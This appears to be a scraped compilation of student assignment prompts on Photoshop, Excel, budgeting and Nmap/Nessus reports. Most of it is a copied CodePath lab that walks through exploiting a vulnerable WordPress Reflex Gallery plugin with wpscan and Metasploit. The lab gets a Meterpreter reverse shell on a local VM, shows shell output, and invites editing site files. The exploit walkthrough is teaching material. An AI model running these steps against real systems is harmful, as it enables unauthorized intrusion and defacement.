Photoshop 11 assignment


Instructions: Find an old family photo to restore. Enhance the photo with at least five different elements that you’ve learned about in Lessons 1-5 of the Part 2 Text. Then, create a magazine cover page using that photo with some creative idea behind it, utilizing at least one other photo for a background. You will upload three photos minimum: the original family photo, the background photo, and the final cover page.

Once this is completed, you will complete a write-up of at least four pages (not including the title page or reference page), in 12-point Times New Roman, double-spaced, in APA Style format, describing the following:

1. Purpose of the magazine. You must identify a valid purpose as if this magazine will be published for the public.
2. Describe the tools used from Lesson 1 and any challenges or purpose identified.
3. Describe the tools applied from Lesson 2 and why they were selected.
4. Describe the layers applied from Lesson 3 and why they were selected.
5. Examine the differences, the benefits and the limitations of the different image file types.
6. Discuss the purpose and usage of smart objects, layers, and vectors in editing; also differentiate between a raster image and a vector image, and detail the layer concepts of hiding, linking, and setting layer styles.
7. Outline the different processes to enhance images, including sharpness, color, contrast, hue, brightness, and resolution.
8. Evaluate the image processing capabilities such as feathering, filtering, and burning.
9. Describe the process for performing advanced selection using masks, channels, refine edge, and defringing.
10. Detail the capabilities of Adobe Photoshop as a tool for editing and restoring digital images; also describe the process to enhance digital images by manipulating sharpness, color, contrast, hue, brightness, and resolution.

Submission Instructions: Submit the original family photo, background photo, final cover page and write-up in APA format in the assignment area.
You may need to reduce the file size of the images if the file is over 25 MB. Do this by reducing the PPI for the image.

 

 

 

 

See below for the topics of Lessons 1-6.

 

 

Lesson 1: Creating Raster Images
  Topic A: Draw with Brushes
  Topic B: Create Gradients
  Topic C: Apply Tool Presets

Lesson 2: Applying Vector Image Tools
  Topic A: Create Images with Vector Paths
  Topic B: Apply the Shape Drawing Tools
  Topic C: Work with Type
  Topic D: Apply Type Special Effects

Lesson 3: Applying Advanced Layer Techniques
  Topic A: Modify Images with Masks
  Topic B: Apply Special Effects by Using Filters
  Topic C: Apply Special Effects to Layers
  Topic D: Apply Smart Objects for Nondestructive Editing

Lesson 4: Automating Tasks
  Topic A: Create and Apply Actions
  Topic B: Batch Process Files with Photoshop and Adobe Bridge

Lesson 5: Editing Video
  Topic A: Edit Video
  Topic B: Add Graphics, Titles, and Animation to Video

Lesson 6: Setting Project Requirements
  Topic A: Identify Purpose, Audience, and Audience Needs
  Topic B: Adhere to Copyright Rules for Artwork, Graphics, and Graphics Use
  Topic C: Determine and Evaluate Project Management Tasks and Responsibilities

 

Excel Worksheet assignment


A Skills Approach: Excel 2016 Chapter 3: Using Formulas and Functions

1 | Page Fix It 3.6 Last Updated 3/19/18

Fix It 3.6

In this project, you will correct function mistakes and other formula errors in a workbook designed for planning a large party or event. Be sure to save your work often!

Skills needed to complete this project:
• Checking Formulas for Errors
• Finding Errors Using Trace Precedents and Trace Dependents
• Displaying and Printing Formulas
• Creating Formulas Using Counting Functions
• Finding Minimum and Maximum Values
• Formatting Text Using Functions
• Using CONCAT to Combine Text
• Finding Data Using the VLOOKUP Function
• Using the Function Arguments Dialog to Enter Functions
• Using Formula AutoComplete to Enter Functions
• Calculating Averages
• Naming Ranges of Cells
• Working with Named Ranges
• Updating Named Ranges with the Name Manager
• Editing and Deleting Names with the Name Manager
• Using Date and Time Functions
• Using the Logical Function IF
• Creating Formulas Referencing Data from Other Worksheets
• Calculating Loan Payments Using the PMT Function

1. Open the start file EX2016-FixIt-3-6. The file will be renamed automatically to include your name. Change the project file name if directed to do so by your instructor, and save it.

2. If the workbook opens in Protected View, click the Enable Editing button in the Message Bar at the top of the workbook so you can modify it.

3. On the GuestList sheet, check all the formulas. Cells to check are filled with the light orange color. Most of them need to be corrected. Use error checking as needed and/or display the formulas on-screen for easy viewing.

   a. In the Name Tag column, modify the formula to display the guest name in this format: BILL SMITH
      Hint: There are multiple errors in this formula. Fix the formula in cell D10 and then copy it to the other cells in the column.
   b. Correct the function used in cell A3 to calculate the sum of the values in the NumAttending column.
   c. Correct the function used in cell A4 to count the number of values in the Street column.
   d. Correct the function used in cell A5 to count the number of blank cells in the NumAttending column.
   e. Correct the function used in cell A6 to display the largest value in the NumAttending column.
   f. Correct the function used in cell A7 to display the average value in the NumAttending column.


4. On the Shopping List sheet, check all the formulas. Cells to check are filled with the light orange color. Most of them need to be corrected. Many of the problems on this worksheet can be solved by creating named ranges or using a name that already exists.

   a. The formula in cell B2 uses the wrong function.
   b. The formulas in cells A9:A23 reference a named range that doesn’t exist. There is more than one correct way to fix this problem using the cell range A5:H18 on the Places to Shop worksheet. You can create the named range referenced in the formulas, or you can change the function arguments to reference the cell range instead.
   c. The formula in cell H9 results in the correct value. However, the workbook author copied this formula to the remaining cells in the column and those values are definitely not correct! Fix the formula in cell H9 and copy it to cells H10:H23. Hint: Notice that cell H8 is named Tax.

5. If you’ve fixed the formulas in cells H9:H23 correctly, the formulas in cells I9:I23 and G5 should calculate properly now. However, the formulas in cells G2:G4 still have errors that need to be fixed. Hint: Use error checking as needed and/or display the formulas on-screen for easy viewing.

   a. Correct the function used in cell G2 to calculate the average value of the Cost column.
   b. Correct the function used in cell G3 to display the largest value in the Cost column.
   c. Correct the function used in cell G4 to display the smallest value in the Cost column.

6. On the Summary sheet, you will be entering all the formulas. Cells to complete are filled with the light orange color. Hint: Use error checking as needed and/or display the formulas on-screen for easy viewing.

   a. Cell B2 should use a function that will update the date to the current date every time the workbook is opened.
   b. Cell B4 references a named range that doesn’t exist. It should reference cell A4 on the Guest List sheet. You can create the named range or edit the formula to reference the cell instead.
   c. Cell B5 references a named range that doesn’t exist. It should reference cell A3 on the Guest List sheet. You can create the named range or edit the formula to reference the cell instead.
   d. Cell B8 is missing the formula to calculate whether or not the total Cost with tax on the Shopping List sheet + the total Cost for purchasing and mailing invitations on the Guest List sheet is greater than the available cash. The cell should display yes or no.
   e. Add a formula to cell B9 to calculate the amount to borrow (total Cost with tax on the Shopping List sheet + the total Cost for purchasing and mailing invitations on the Guest List sheet – the cash available) if the value in cell B8 is yes. If the value in cell B8 is not yes, the cell should display 0.
   f. Add a formula to cell B12 to calculate the monthly loan payment based on the information in cells B9:B11. Use a negative number for the Pv argument.

7. Save and close the workbook.

8. Upload and save your project file.

9. Submit project for grading.


Budget Estimating assessment help


This assignment consists of 2 parts: questions about budget estimation and developing a budget.

Part 1 Questions (10 points)

Provide responses to the following questions

1.    You are providing a review of contractor bids for a component of your upcoming project.  What can be done to determine whether or not a vendor’s bid is reasonable?

2.    Describe the conditions for which parametric, analogous and bottom up estimation techniques work best, and provide 2 examples in support of each method.

3.    Why is a cost management plan important?  How does the plan benefit the project manager?

Part 2 Budget Estimating (30 points)

Using the same scenario from the previous unit on scheduling, create a time-phased budget for the following project.  Prepare a figure like Exhibit 10.9, CPT 4e, that illustrates the daily and cumulative costs for the resource-leveled project.

Assume the following hourly rates:

Alcides $45 / hr.

Joan $50 / hr.

Part 3 Budget Estimating (50 points)

You are the project manager for a process improvement project for Company XYZ.    Prepare a figure like Exhibit 10.9 that illustrates the weekly and cumulative costs for the resource-leveled project.

Hint: To accomplish this exercise, you’ll need to create a project schedule in MS Excel (or by hand), create resource assignments, assign costs to each resource, and assign the resources to each task.  Some resource leveling will be required.

In this project, you have 3 employees: Ann, Becky and Clive.  Each person is limited to the amount of time allocated to your project.  Ann and Becky are available 30 hours/week; Clive is available 20 hours/week.  Their hourly rates are: Ann: $60/hour; Becky: $35/hour; and Clive: $50/hour.

Mechanics (10 points)

Part 1 responses should be presented in a question-response format.  Use Arial font with 11 point. There is no word limit.

Your Instructor will use Turn-it-in to ensure your paper is authentic work.  To avoid plagiarism, see the course home page for more information and use the Purdue Online Writing Lab to learn how to paraphrase, summarize and cite the references you use in all academic writing assignments.

Parts 2 and 3: Use MS Excel (MS Project is not acceptable) to create the budget estimate and present it similar to Exhibit 10.9.  Show intermediate steps (schedule, resource schedule assignments, resource-leveled schedule and any other elements needed to create the time-phased budget estimate).

It is expected that each part of this assignment have excellent mechanics (presentation, grammar and spelling) and exhibit the quality of work capable of a group of graduate students and working professionals. All sections of the document submitted must be readable at 100% magnification.


Project Documentation assignment help


Project implementation is arguably the most exciting stage of the project management process. It is during project implementation that project plans begin to come to life and assumptions are able to be tested and measured in real-life scenarios.

One of the outcomes of project implementation is a set of deliverables that typically includes a system diagram; a network diagram; a database design document, including an entity-relationship diagram, a data dictionary, and table definitions; a clearly articulated cybersecurity plan; and source code.

To complete this assignment, you will create:

  • A system diagram that shows, in graphic form, the components of your project.
    • Your system diagram should follow the system description you submitted in your Week 2 project plan (but may differ based on the research you have conducted since Week 2).
    • You may create your system diagram in Microsoft PowerPoint or a graphics program of your choice.
  • A network diagram that shows, in graphic form, the flow of data within your project.
    • Your network diagram should follow the network description you defined in the Week 2 project plan (but may differ based on the research you have conducted since Week 2).
    • You may create your network diagram in Microsoft PowerPoint or a graphics program of your choice.
  • A database design document, including an entity-relationship diagram, a data dictionary, and table definitions, representing all of the data that must be stored and maintained within the context of your project and how that data is organized.
  • A clearly articulated cybersecurity plan that explains how you plan to secure project data and processes.
  • Source code (may be partial) for at least one software application.
    • Your source code may be implemented in HTML/JavaScript, Java, C++, or another programming language.
  • A quality assurance and software test plan.
  • Download the Software Test Plan for an example of what information is typically included and how it is typically organized in a software test plan.
 

Disaster Recovery


Graded Assignments may be found at the end of each chapter of the required textbook under the title “Real-World Exercises”. Each assignment is due between Monday to Sunday evening by 11:59 p.m. EST. of the respective week. Each student is to select one exercise (per module exercise) from the grouping as identified below. Provide documented evidence, in Moodle, of completion of the chosen exercise (i.e. provide answers to each of the stated questions). Detailed and significant scholarly answers will be allotted full point value. Incomplete, inaccurate, or inadequate answers will receive less than full credit depending on the answers provided. All submissions need to be directed to the appropriate area within Moodle. Late submissions, hardcopy, or email submissions will not be accepted.

Module 1 Graded Assignment

From Chapter 1, page 37, Real World Exercise 1.1

 

Nmap Report Assignment

3. Review the Lab 5 Nmap Scan Report that accompanies this lab.

4. Using the Lab 5 Nmap Scan Report, answer the following questions:

• What are the date and timestamp of the Nmap host scan?

• What is the total number of loaded scripts for scanning?

• A synchronize packet (SYN) stealth scan discovers all open ports on the targeted host. How many ports are open on the targeted host for the SYN stealth scan at 13:36?

• Identify hosts, operating systems, services, applications, and open ports on devices from the Zenmap GUI (Nmap) scan report.

5. Review the Lab 5 Nessus Vulnerability Scan Report that accompanies this lab.

6. Using the Lab 5 Nessus Vulnerability Scan Report, answer the following questions:

• How many hosts were scanned?

• What were the start and end times for each of the scans?

• How many total vulnerabilities were discovered for each host?

• How many of the vulnerabilities were critical, major, and minor software vulnerabilities?

7. On your local computer, open a new Internet browser window.

8. In the address box of your Internet browser, type the URL http://cve.mitre.org and press Enter to open the Web site.

9. On the Web site, toward the top left of the screen, click the CVE List link.

10. Review the CVE List Main Page.

11. Define CVE.

12. On the right, under Items of Interest, click the Terminology link.

13. Review the definitions for vulnerability and exposure.

14. Define the terms vulnerability and exposure.

15. At the top right of the Web site, click the Search link.

16. In the Search box, type the words Microsoft® XP 2003 Service Pack 1 and click the Search button.

17. Describe some of the results you discover.

18. After viewing the results, conduct another search and this time, type the words Cisco ASA 5505 Security + and click the Search button.

19. Describe some of the search results.

 

WordLists homework


Write a class in Java called WordLists that generates useful word lists for scrabble players using this list.
Your class should contain the following methods:
• WordLists(String fileName): a constructor that takes the name of the dictionary file as the only parameter.
• lengthN(int n): returns an array of words of length n.
• startsWith(int n, char firstLetter): returns an array of words of length n beginning with the letter firstLetter
• containsLetter(int n, char included): returns an array of words of length n containing the letter included but not beginning with it.
• vowelHeavy(int n, int m): returns an array of words of length n containing at least m vowels.
• multiLetter(int m, char included): returns an array of words with at least m occurrences of the letter included.
Write a test class for your WordLists class that tries these methods out and writes the word lists (the arrays of strings) to text files.

 

Cyber Security: Kali Linux Lab homework

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 1/13

Week 8 Lab Exercises: WordPress vs. Kali, Round 2

Last week, we started working with Vagrant and WPDistillery, running WordPress and Kali in separate VMs, and using the wpscan tool to probe an older version of WordPress for weaknesses…and exploit them. Hopefully, you were able to find some interesting exploits to understand how the types of vulnerabilities we looked at over the first six weeks, such as XSS and SQLI, actually work in the wild.

This is only the beginning, though. As proofs-of-concept, many specific web vulnerabilities like XSS only require a simple demonstration, such as a harmless javascript alert or some minor modification to an HTML page. Like a single link in a chain, they aren’t very interesting in isolation, but when combined with other links, these vulnerabilities can be wielded to great effect. Like martial arts students, we begin with the rudiments — simple moves, both attacks and blocks — before we can understand how these are combined into a repertoire of skills.

In practice, the offensive goal is usually achieving the highest level of access possible. The defensive goal is, if not to block the attack outright, to at least contain the damage by limiting the attacker’s access. Nobody plans for their user database to get stolen, but one still hashes and salts passwords anyway, because pwning happens. This week, we’re going to look at how specific exploits become full-blown attacks — and what can be done to stop them.

Milestone 0: Preparing the Playing Field

This week’s lab builds on the previous one in that we’ll be using the previous WP/Kali setup via Vagrant/VirtualBox. We’ll cover some of the same steps again, but refer to last week’s instructions if you need more of a refresher.

First, you’ll need to make sure you have the VirtualBox VMs set up in the same way as last week’s lab:

Kali VM
• Running in VirtualBox
• Logged into desktop

WordPress VM
• Provisioned via Vagrant / WPDistillery
• Running version 4.2

If you are running a version other than 4.2, or if you break your WordPress server during an exploit, you can destroy the current WP instance and remove web content:

Linux and macOS

cd $HOME/WPDistillery
vagrant destroy --force

Enter password for sudo if asked, then delete WordPress content.

rm -rf public

Windows PowerShell (As Administrator)

cd $HOME\WPDistillery
vagrant destroy --force
Remove-Item -Recurse -Force .\public\

All Hosts

Edit wpdistillery/config.yml and change the following value:

# WordPress version
wpversion: 4.2

Start it back up.

vagrant up

Saving Progress: Whenever you need a break from hacking WordPress, you can gracefully shut down the server using vagrant halt. Whenever you wish to resume, use vagrant up to start the server. Make sure you are in the WPDistillery directory when entering the commands (Hint: cd $HOME/WPDistillery).

 

 


Before going further, shut down the WordPress server using vagrant halt on the command line and shut down the Kali VM using either its own shutdown menu or through VirtualBox Manager.

Open a Hole

There’s one more step required for this lab. Because VirtualBox places specific networking restrictions on VMs, we need to configure VirtualBox to allow communication between the Kali VM and the WordPress VM in order to execute a more sophisticated attack.

First, you need to determine the host-only adapter used by the WPDistillery VM. In the VirtualBox client, click on the WPDistillery VM so its information is displayed in the detail pane, and then look at the details under Network. Two adapters should be listed: one “NAT” and one “Host-Only Adapter” with a qualifier like vboxnet0 — that is the host-only network in use, so make a note of it.

Next, you’ll need to set up a DHCP server for that network — this will allow automatic assignments of IP addresses. Go to the Host Network Manager in VirtualBox (via the File menu). When the Host Network Manager dialog comes up:

Bug Alerts: Deleting and re-creating the host-only adapter during step 1 (below) is necessary in order for Kali to pull an IP from the DHCP server later on. Otherwise DHCP will offer IPs in the 192.168.56.0/24 network instead of 192.168.33.0/24. On macOS you may have to re-apply changes twice when setting up DHCP; double-check the numbers before closing the dialog.

1. Highlight the host-only network you identified in the previous step, delete it and then re-create it, then click on the Properties button at the top of the dialog.

2. When the nested dialog appears, click on the DHCP Server tab and set the following fields:
   ☑ Enable Server
   Server Address: 192.168.33.2
   Server Mask: 255.255.255.0
   Lower Address Bound: 192.168.33.100
   Upper Address Bound: 192.168.33.200

Click Apply and Close to apply these changes and exit. Restart the WPDistillery VM using the command line (vagrant up) and confirm the WordPress site is still accessible via wpdistillery.vm.

Now, back in the VirtualBox client, click on the Kali VM. If it is running, power it down (right-click on the VM, Close >> Power Off). Then in the Kali VM settings (right-click on the VM, Settings), add a second adapter pointing to the same host-only network:

1. Click on Network
2. Click on Adapter 2 and set the following fields:
   ☑ Enable Network Adapter
   Attached to: Host-only Adapter
   Name: specify the host-only adapter modified in the previous step
3. Click OK
4. Start the Kali VM (right-click on the VM, Start >> Normal Start)
5. Open a terminal and run the following command to remove the default network profiles and reboot Kali

In Kali Terminal, run: sudo rm /etc/NetworkManager/system-connections/* ; sudo reboot

 

 


6. After Kali reboots, log back in and confirm that you have 3 interfaces by opening a Terminal and running ip addr:
   • lo (loopback) with IP address of 127.0.0.1
   • eth0 (NAT) with IP similar to 10.x.x.x
   • eth1 (Host-only) with IP of 192.168.33.100

7. Verify connectivity to your WordPress server and the Internet from Kali.
   ping google.com
   ping wpdistillery.vm or ping 192.168.33.10

End the pings with Ctrl + C

If the setup was successful, both Kali and WordPress should have access to 2 networks now. One is used for Internet access in order to facilitate downloading of WordPress plugins and Kali attack tools. The other network doesn’t have Internet access, but is only a network of the VMs that are connected to it. This latter network is the one that’ll be used as a safe sandbox for practicing our exploits.
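
A quick way to confirm the two-network layout described above before continuing, as an added example that is not part of the original lab: it parses `ip -o -4 addr show` output and checks it against the addresses the lab gives, including the 192.168.56.0/24 failure mode from the Bug Alerts note. The sample output is constructed, and the function and constant names are hypothetical.

```python
import ipaddress

# Addresses below come from the lab text; names and sample data are illustrative.
HOST_ONLY_NET = ipaddress.ip_network("192.168.33.0/24")
DHCP_LOW = ipaddress.ip_address("192.168.33.100")    # Lower Address Bound
DHCP_HIGH = ipaddress.ip_address("192.168.33.200")   # Upper Address Bound
WRONG_NET = ipaddress.ip_network("192.168.56.0/24")  # subnet named in "Bug Alerts"
WORDPRESS_IP = ipaddress.ip_address("192.168.33.10")

# Constructed sample of `ip -o -4 addr show` output (not captured from a real VM).
SAMPLE_OK = r"""
1: lo    inet 127.0.0.1/8 scope host lo\       valid_lft forever preferred_lft forever
2: eth0    inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic eth0\       valid_lft 86000sec preferred_lft 86000sec
3: eth1    inet 192.168.33.100/24 brd 192.168.33.255 scope global dynamic eth1\       valid_lft 1100sec preferred_lft 1100sec
"""

# Same host, but the host-only adapter was not re-created (constructed failure case).
SAMPLE_BUG = SAMPLE_OK.replace(
    "192.168.33.100/24 brd 192.168.33.255",
    "192.168.56.101/24 brd 192.168.56.255",
)


def parse_ip_addr(text):
    """Return [(ifname, IPv4Interface), ...] from one-line-per-address output."""
    addrs = []
    for line in text.splitlines():
        fields = line.split()
        # Expected layout: "<index>: <ifname> inet <addr>/<prefix> ..."
        if len(fields) >= 4 and fields[2] == "inet":
            addrs.append((fields[1], ipaddress.ip_interface(fields[3])))
    return addrs


def check_lab_network(text):
    """Return a list of problems; an empty list means the layout matches the lab."""
    problems = []
    addrs = parse_ip_addr(text)

    # Failure mode from the lab: DHCP handed out an address in the wrong subnet.
    for name, iface in addrs:
        if iface.ip in WRONG_NET:
            problems.append(
                f"{name}: {iface.ip} is in {WRONG_NET}; re-create the "
                "host-only adapter and its DHCP server"
            )

    host_only = [(n, i) for n, i in addrs if i.ip in HOST_ONLY_NET]
    if not host_only:
        problems.append(f"no interface in {HOST_ONLY_NET}; sandbox network missing")

    for name, iface in host_only:
        if not DHCP_LOW <= iface.ip <= DHCP_HIGH:
            problems.append(f"{name}: {iface.ip} is outside the configured DHCP pool")
        if WORDPRESS_IP not in iface.network:
            problems.append(f"{name}: {WORDPRESS_IP} is not on-link via {iface.network}")

    # A separate non-loopback interface should carry Internet (NAT) traffic.
    has_nat = any(
        not i.ip.is_loopback and i.ip not in HOST_ONLY_NET and i.ip not in WRONG_NET
        for _, i in addrs
    )
    if not has_nat:
        problems.append("no NAT interface found for Internet access")
    return problems


if __name__ == "__main__":
    for label, sample in (("expected layout", SAMPLE_OK), ("bug case", SAMPLE_BUG)):
        issues = check_lab_network(sample)
        print(label, "->", "OK" if not issues else issues)
```
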

Milestone 1: Opening an Attack Surface

Our first victim is a WordPress plugin for displaying image galleries called Reflex Gallery.

1. In the WP admin console, go to Plugins -> Add New
2. Search for reflex gallery and you should see ReFlex Gallery » WordPress Photo Gallery
3. Click on the result but don’t install the plugin yet. Look at the Changelog tab for any critical security issues that were patched and install the version just before it was patched.
4. On the right side of the dialog, where it lists the compatibility and installs data, click the WordPress.org Plugin Page » link
5. You’ll be taken to the official WP plugin page. Click on the Development tab
6. Click Advanced View
7. Under Previous Versions, download the 3.1.3 zip file
8. In the WordPress admin console, go to Plugins -> Add New -> Upload Plugin, specify the zip file you downloaded, then click Install Now
9. Go to admin console plugins page, find the plugin, and click Activate

Challenge: Beyond activating the plugin, you need to use it in a page or a post on the WP instance. Create a gallery and use it in a page before proceeding.

 

 


Milestone 2: Recon

The following steps should be run in the Kali VM’s Terminal emulator.

So we know the blog is accessible from the host OS and Kali VM at wpdistillery.vm, which is simply a local IP aliased via the /etc/hosts file. Let’s re-run wpscan against the URL:

wpscan --url http://wpdistillery.vm --random-agent

The output should include the vulnerability associated with Reflex Gallery:

[!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload
    Reference: https://wpvulndb.com/vulnerabilities/7867
    Reference: http://packetstormsecurity.com/files/130845/
    Reference: http://packetstormsecurity.com/files/131515/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4133
    Reference: https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_
    Reference: https://www.exploit-db.com/exploits/36374/
[i] Fixed in: 3.1.4

Arbitrary File Upload. Sounds promising. At this point, we could dig in, research the source code, come up with a carefully-crafted demonstration of the specific, underlying exploit. But instead of that, let’s just go right for the throat and attack this with a sledgehammer.

Milestone 3: Hello, Metasploit

Metasploit is an exploitation framework. One of the most popular tools in Kali, it’s the free part of a larger, commercial project used widely in web security penetration testing. And by hackers. If wpscan is a dental pick, Metasploit is a set of carving knives.

Metasploit currently has over 1600 exploits, organized in different categories like:

• Browser-based: a large collection of (mostly) remote code execution exploits
• Mobile: Android, iOS
• OS-specific: Linux, Windows, Solaris, etc.
• Combinations of the above

Metasploit currently has hundreds of payloads. Some of them are:

• Command shells, enabling attackers to run scripts or arbitrary commands against a host
• Meterpreter payloads, enabling attackers to control the screen of a device using VNC and to browse, upload and download files
• Dynamic payloads, enabling attackers to evade anti-virus defenses by generating unique payloads

For this attack, we’ll be using Meterpreter to open a shell into the target machine. Read more about Meterpreter here

Metasploit uses a database to manage exploit/payload information and also attack data. So you need to initialize the DB, then load the console:

sudo service postgresql start
sudo msfdb init
msfconsole

 

 


Fun fact: you get different ASCII art every time. And they say hackers don’t care about UX. Note the command prompt has changed to msf5 > . You are now in a shell within another shell within a VM.

In the snippets below, the > character denotes the end of the prompt (similar to how $ is used to denote a non-root user’s bash prompt). For example, msf5 > is the MSF prompt. The commands to enter will follow the > in most of the examples below.

First check that the DB is connected OK. The DB isn’t strictly necessary but MSF runs faster with it.

msf5 > db_status
[*] Connected to msf. Connection type: postgresql.

Now we’re ready.

Milestone 4: Pwnage

In MSF, start by searching the exploit database for something related to the plugin affected by the vulnerability. You could search on several different terms to find something, but in this case, the plugin has an unusual word in its name, “Reflex”.

Enter search Reflex into MSF:

msf5 > search Reflex
[!] Module database cache not built yet, using slow search

Matching Modules
================

Name                                              Disclosure Date  Rank       Descriptio
----                                              ---------------  ----       -----------
exploit/unix/webapp/wp_reflexgallery_file_upload  2012-12-30       excellent  WordPress

Well, that sure looks handy. It’s even ranked excellent, which should suggest to you that not all of these tools are created equal. Some work better than others; some don’t work at all. In fact, what follows may not work perfectly for you, so don’t be too surprised if it doesn’t go swimmingly. These are hacks, after all: user-supported code and scripts whose primary purpose is to compromise systems, so robustness isn’t exactly a guarantee. Give it a shot, but be prepared for some possible difficulty ahead.

The command to use the exploit is unsurprisingly called use and takes the exploit’s name as an argument. Once loaded, the command prompt changes again, and you can run the info command.

msf5 > use exploit/unix/webapp/wp_reflexgallery_file_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(wp_reflexgallery_file_upload) > info

Notice the output lists the affected version and some options we’ll need to set:

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 7/13

Use the  set  command to specify  RHOST  accordingly. If your blog isn’t hosted at the root ( / ), you could additionally pass in the path by setting  TARGETURI  (but the WpDistillery setup should work with the default).

msf5 exploit(wp_reflexgallery_file_upload) > set RHOST wpdistillery.vm RHOST => wpdistillery.vm

Before we can run the exploit, we need to specify the  LHOST  i.e. which IP address should Kali (localhost) receive a shell on. The default might be in the NAT network in which cause the exploit will work but no session will be opened. To ensure that we get a shell back on the host-only adapter’s IP address, we will set it explicitly.

msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LHOST 192.168.33.100 LHOST => 192.168.33.100

You can probably guess the command used to finally run the exploit (it’ll take a minute to run):

Available targets: Id Name — —- 0 Reflex Gallery 3.1.3

Check supported: Yes

Basic options: Name Current Setting Required Description —- ————— ——– ———– Proxies no A proxy chain of format type:host:port[,type:host:p RHOSTS yes The target host(s), range CIDR identifier, or hosts RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the wordpress application VHOST no HTTP server virtual host

Payload information:

Description: This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution.

msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > exploit

[*] Started reverse TCP handler on 192.168.33.100:4444 [+] Our payload is at: mcxgHJixsWZpS.php. Calling payload… [*] Calling payload… [*] Sending stage (38288 bytes) to 192.168.33.10 [*] Meterpreter session 1 opened (192.168.33.100:4444 -> 192.168.33.10:51778) at 2020-10-11 [+] Deleted mcxgHJixsWZpS.php

meterpreter >

 

 


Having problems? See the Troubleshooting section at the end of this milestone.

Notice the command prompt changed to  meterpreter > . The meterpreter payload ( mcxgHJixsWZpS.php ) was uploaded, executed, then deleted (just like campers, hackers should leave no trace), and now we have a connection to the target machine. Run the  shell  command when you see the  meterpreter >  prompt to load a new shell:

    meterpreter > shell
    Process 5315 created.
    Channel 0 created.

A shell within a shell within a shell. But this shell is different; this shell is running on the WordPress VM. In case it’s not clear, you really shouldn’t be able to do that. Notice the new shell spawned by Meterpreter doesn’t bother with command prompts at all, so it might just look like nothing’s happening after the process and channel are created. Try running some commands, like  whoami  and  pwd :

    whoami
    www-data
    pwd
    /var/www/public/wp-content/uploads/2020/10
    echo $PATH
    /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
    exit
    meterpreter >

Lines 2, 4, and 6 in the above snippet are output. It’s a low-fi shell, and somewhat limited, but it works, and it’s enough to compromise the whole machine. We can see we’re shell’d in as the  www-data  user and presently in one of the WordPress upload directories, which is where the malicious PHP payload was delivered.

The  exit  command on line 7 above gets us back to the  meterpreter >  prompt, which has fewer but more usable commands than the shell. For instance, we can poke around with  pwd ,  cd ,  ls , and  cat :

 

 


    meterpreter > pwd
    /var/www/html/wp-content/uploads/2017/03
    meterpreter > cd ../../..
    meterpreter > pwd
    /var/www/html/wp-content
    meterpreter > ls
    Listing: /var/www/html/wp-content
    =================================

    Mode              Size  Type  Last modified              Name
    ----              ----  ----  -------------              ----
    100644/rw-r--r--  29    fil   2017-03-18 19:01:59 +0000  index.php
    40755/rwxr-xr-x   4096  dir   2017-03-18 01:13:31 +0000  plugins
    40755/rwxr-xr-x   4096  dir   2017-03-16 20:06:21 +0000  themes
    40755/rwxr-xr-x   4096  dir   2017-03-18 01:13:31 +0000  upgrade
    40755/rwxr-xr-x   4096  dir   2017-03-18 01:13:31 +0000  uploads

    meterpreter > cat index.php
    <?php
    // Silence is golden.

Troubleshooting

Meterpreter may fail to establish a connection after running  exploit  in Metasploit. This might be a one-off error, but if you can’t get it to work, here are a few alternatives you can try:

The whole setup can be simplified by bypassing the Kali VM and simply installing Metasploit to your host machine and running the same instructions from within Metasploit on your host machine. We don’t recommend this approach unless the above doesn’t work for you, for the simple reason that it’s not a great idea to install hacking tools on to your host system. By having things like Metasploit and vulnerable WordPress versions contained within VMs, any risks can be compartmentalized and easily cleaned up. That said, there’s nothing especially dangerous about installing Metasploit to your host system, but if you do install it, we’d recommend you remove it after the course is done.

As an alternative workaround to the above that still uses the Kali VM, you can set up port forwarding through localhost. In VirtualBox, stop your Kali VM, open its Settings, and under Network, disable Adapter 2 (as created in Milestone 0), then switch back to Adapter 1 and click Port Forwarding. Click the Add button at right and use the following settings:

    Name:  metasploit
    Protocol:  TCP
    Host IP:  127.0.0.1
    Host Port:  4444
    Guest IP: (leave blank)
    Guest Port:  4444

Click OK and restart Kali. Then, in Metasploit, load the exploit (via  use ), set  LHOST  to your host PC’s IP address (not the VM IP) and  LPORT  to  4444 , then try  exploit  again.

Milestone 5: Tag it

 

 


Challenge: Make a change to the WP content. You can open a  vi  editor from  meterpreter > using the  edit <file>  command. Use this to alter one of the PHP files in some subtle, tasteful way. For example:

Meterpreter Cheat Sheet

And that’s pretty much game over for this scenario. Once an attacker is able to gain this level of access, a whole universe of options suddenly opens up. If the machine is configured appropriately, those options may be limited, but this is not a position any sysadmin wants to be in, even with everything configured perfectly. In the best case scenario, the attack surface available to the intruder is intolerably large.

Badge Earned: Script Kiddie

Congratulations: at this point, you are officially a script kiddie. Hopefully this has given you a sense of the power of these tools, how even a single, specific exploit affecting some random plugin can be weaponized in a way that’s frighteningly easy to use. In the above example, we just compromised the whole system, so it’s tempting to feel like there’s some real skill involved in what we’re doing here. But we’re standing on the shoulders of giants. Just go back and read more about Meterpreter:

“…an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.”

Now writing something like that takes real skill. Remember, everything available in Kali has been used extensively by others. Many of these kinds of tools started out as someone’s secret weapon of choice and gradually filtered out into the public domain. That’s not to say Kali isn’t powerful or even dangerous (it is). But the most effective, advanced attacks and tools in use today certainly aren’t bundled in Kali.

Milestone 6: Going Deeper

